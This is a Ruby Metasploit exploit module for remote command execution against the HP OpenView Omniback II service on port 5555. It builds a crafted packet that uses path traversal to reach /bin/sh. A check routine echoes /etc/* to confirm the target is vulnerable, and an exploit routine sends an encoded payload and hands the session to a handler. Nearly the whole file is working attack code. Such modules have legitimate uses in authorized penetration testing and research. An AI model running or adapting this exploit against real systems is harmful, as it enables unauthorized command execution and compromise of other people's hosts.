require 'msf/core' module Msf class Exploits::Unix::Misc::OpenView_Omniback_Execute < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView Omniback II Command Execution', 'Description' => %q{ This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 3778 $', 'References' => [ ['OSVDB', '6018'], ['BID', '11032'], ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'], ['MIL', '46'], ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DisclosureDate' => 'Feb 28 2001', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5555) ], self.class) end def check connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00/../../../bin/sh"+ "\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) sock.put("echo /etc/*;\n") res = sock.get_once(-1, 5) disconnect if (not (res and res.length > 0)) print_status("The remote service did not reply to our request") return Exploit::CheckCode::Safe end if (res =~ /passwd|group|resolv/) print_status("The remote service is exploitable") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit connect poof = "\x00\x00\x00.2"+ "\x00 a"+ "\x00 0"+ "\x00 0"+ "\x00 0"+ "\x00 A"+ "\x00 28"+ "\x00/../../../bin/sh"+ "\x00\x00"+ "digit "+ "AAAA\n\x00" sock.put(poof) sock.put(payload.encoded + ";\n") res = sock.get_once(-1, 5) if (not (res and res.length > 0)) print_status("The remote service did not reply to our request") disconnect return end print(res) handler disconnect end end end